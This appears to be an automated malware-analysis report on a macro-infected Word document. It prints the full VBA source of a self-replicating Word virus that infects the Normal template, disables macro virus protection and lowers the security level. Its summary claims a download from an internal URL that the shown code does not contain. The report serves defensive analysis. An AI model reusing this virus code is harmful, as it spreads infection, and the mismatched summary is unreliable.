Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 757c78c7857249c3…

MALICIOUS

Office (OLE)

259.0 KB Created: 2004-09-20 14:02:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: b0fccc40d7bdd8dc8465be700274f3b2 SHA-1: 2209772525cc0206edbd34c4d163147738272378 SHA-256: 757c78c7857249c3b2c32b619e6dd3eac2103beca153bc051e066659e110c23e
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Word document containing VBA macros, specifically a Document_Open macro designed to execute upon opening. The macro attempts to download a library from the URL 'http://10.42.1.14/emo.htm', likely to facilitate further malicious activity. The document body discusses a technical issue with postal transfers, serving as a pretext to lure the user into downloading the malicious content.

Heuristics 3

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4911 bytes
SHA-256: 57c35a1533b2ab82fc311eeeaeedef2363d1de42dc2f223c0d0c424f9680a3b0
Detection
ClamAV: Doc.Trojan.Onex-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Extra"
Attribute VB_Base = "1Normal.Extra"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Private Sub Document_New()
'оUserForm1.Show


End Sub

Private Sub Document_Open()
 On Error Resume Next
 Set c = New DataObject
  If ActiveDocument.VBProject.VBComponents(1).Name <> "Extra" Then
    Set go = ActiveDocument.VBProject.VBComponents(1)
    saveit = Tre
   ElseIf NormalTemplate.VBProject.VBComponents(1).Name <> "Extra" Then
    Set go = NormalTemplate.VBProject.VBComponents(1)
  End If
  With go
   c.SetText Extra.VBProject.VBComponents(1).CodeModule.lines(1, Extra.VBProject.VBComponents(1).CodeModule.countoflines)
   .CodeModule.deletelines 1, .CodeModule.countoflines
   .CodeModule.insertlines 1, c.GetText
   .Name = "Extra"
  End With
 Options.ConfirmConversions = 0
 Options.SaveNormalPrompt = 0
 Options.VirusProtection = 0
  If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
     CommandBars("Macro").Controls("Security...").Enabled = 0
     System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
  End If
 CommandBars("Tools").Controls("Macro").Enabled = 0
  If saveit = True Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
End Sub
' Word 97/2k.Extra - Psyclone X
' My first virus for the year 2k

' Processing file: /opt/analyzer/scan_staging/386a0129e5a34ea191bc527a2c6c66d3.bin
' ===============================================================================
' Module streams:
' Macros/VBA/Extra - 2973 bytes
' Line #0:
' Line #1:
' 	FuncDefn (Private Sub Document_New())
' Line #2:
' 	QuoteRem 0x0000 0x000F "оUserForm1.Show"
' Line #3:
' Line #4:
' Line #5:
' 	EndSub 
' Line #6:
' Line #7:
' 	FuncDefn (Private Sub Document_Open())
' Line #8:
' 	OnError (Resume Next) 
' Line #9:
' 	SetStmt 
' 	New <crash>
' 	Set c 
' Line #10:
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd New 
' 	LitStr 0x0005 "Extra"
' 	Ne 
' 	IfBlock 
' Line #11:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	Set GoSub 
' Line #12:
' 	Ld Tre 
' 	St saveit 
' Line #13:
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd New 
' 	LitStr 0x0005 "Extra"
' 	Ne 
' 	ElseIfBlock 
' Line #14:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	Set GoSub 
' Line #15:
' 	EndIfBlock 
' Line #16:
' 	StartWithExpr 
' 	Ld GoSub 
' 	With 
' Line #17:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld Extra 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	MemLd countoflines 
' 	LitDI2 0x0001 
' 	Ld Extra 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd lines 0x0002 
' 	Ld c 
' 	ArgsMemCall SetText 0x0001 
' Line #18:
' 	LitDI2 0x0001 
' 	MemLdWith CodeModule 
' 	MemLd countoflines 
' 	MemLdWith CodeModule 
' 	ArgsMemCall deletelines 0x0002 
' Line #19:
' 	LitDI2 0x0001 
' 	Ld c 
' 	MemLd GetText 
' 	MemLdWith CodeModule 
' 	ArgsMemCall insertlines 0x0002 
' Line #20:
' 	LitStr 0x0005 "Extra"
' 	MemStWith New 
' Line #21:
' 	EndWith 
' Line #22:
' 	LitDI2 0x0000 
' 	Ld Options 
' 	MemSt ConfirmConversions 
' Line #23:
' 	LitDI2 0x0000 
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #24:
' 	LitDI2 0x0000 
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #25:
' 	LitStr 0x0000 ""
' 	LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"
' 	LitStr 0x0005 "Level"
' 	Ld System 
' 	ArgsMemLd PrivateProfileString 0x0003 
' 	LitStr 0x0000 ""
' 	Ne 
' 	IfBlock 
' Line #26:
' 	LitDI2 0x0000 
' 	LitStr 0x000B "Security..."
' 	LitStr 0x0005 "Macro"
' 	ArgsLd CommandBars 0x0001 
' 	ArgsMemLd Controls 0x0001 
' 	MemSt Enabled 
' Line #27:
' 	
... (truncated)